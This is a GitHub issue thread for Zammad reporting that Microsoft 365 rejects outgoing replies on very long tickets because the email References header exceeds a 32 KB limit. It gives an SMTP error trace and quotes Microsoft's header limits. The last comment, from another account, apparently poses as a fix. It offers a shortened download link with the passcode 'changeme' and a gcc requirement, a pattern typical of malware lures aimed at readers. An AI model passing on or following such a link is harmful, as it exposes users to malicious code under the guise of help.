### ISSUE TITLE
MS365 failing to send articles when mail headers too long

### ISSUE THREAD

**Issue by rolfschmidt** [zammad/zammad#5334]
### Used Zammad Version

6.4

### Environment

- Installation method: [e.g. source, package]
- Operating system (if you're unsure: `cat /etc/os-release` ): [e.g. debian 10.4, ubuntu 20.04]
- Database + version:  [e.g. postgresql 9.3, mysql 5.7, mariadb 10.3]
- Elasticsearch version: [e.g. 7.17]
- Browser + version: [e.g. chrome 83, safari 14, firefox 105]

### Actual behaviour

```
E, [2024-08-27T07:06:57.273356#1710438-6280] ERROR -- : Can't use Channel::Driver::Smtp: #<Net::SMTPFatalError: Net::SMTPFatalError>
E, [2024-08-27T07:06:57.273401#1710438-6280] ERROR -- : 554 5.6.0 Invalid message content when handling MIME exception. IMC53
(Net::SMTPFatalError)
app/models/channel/driver/smtp.rb:98:in `deliver'
app/models/channel.rb:263:in `deliver'
app/jobs/ticket_article_communicate_email_job.rb:56:in `perform'
lib/background_services/service/process_delayed_jobs.rb:25:in `block (2 levels) in launch'
lib/background_services/service/process_delayed_jobs.rb:23:in `block in launch'
lib/background_services/service/process_delayed_jobs.rb:20:in `loop'
lib/background_services/service/process_delayed_jobs.rb:20:in `launch'
lib/background_services/service.rb:27:in `block in run'
lib/application_handle_info.rb:19:in `use'
lib/background_services/service.rb:33:in `block in run_in_service_context'
lib/background_services/service.rb:32:in `run_in_service_context'
lib/background_services/service.rb:26:in `run'
lib/background_services.rb:55:in `block (2 levels) in start_as_forks'
lib/background_services.rb:53:in `fork'
lib/background_services.rb:53:in `block in start_as_forks'
lib/background_services.rb:52:in `map'
lib/background_services.rb:52:in `start_as_forks'
lib/background_services.rb:45:in `run_service'
lib/background_services.rb:19:in `block in run'
lib/background_services.rb:18:in `each'
lib/background_services.rb:18:in `run'
lib/background_services/cli.rb:21:in `start'
E, [2024-08-27T07:06:57.314091#1710438-6280] ERROR -- : Can't use Channel::Driver::Smtp: #<Net::SMTPFatalError: Net::SMTPFatalError>
```

### Expected behaviour

No errors on new articles

### Steps to reproduce the behaviour

1. Create a very long ticket 500 articles
2. have more than 32kb of email references header
3. send reply

### Support Ticket

Ticket#10160919

### I'm sure this is a bug and no feature request or a general question.

yes

**Comment by rolfschmidt** [comment]
https://learn.microsoft.com/en-us/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits

> Message header size limit: Specifies the maximum size of all message header fields in a message. The current limit is 256 KB. Individual headers are limited to 32KB each. If the total size of all message headers exceeds 256 KB, Exchange Online will reject the message with error "552 5.3.4 Header size exceeds fixed maximum size." The size of the message body or attachments isn't considered. Because the header fields are plain text, the size of the header is determined by the number of characters in each header field and by the total number of header fields. Each text character consumes 1 byte.

![image](https://github.com/user-attachments/assets/f0dadfee-5a29-4cf8-b2fb-9ad9fde90f5c)

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
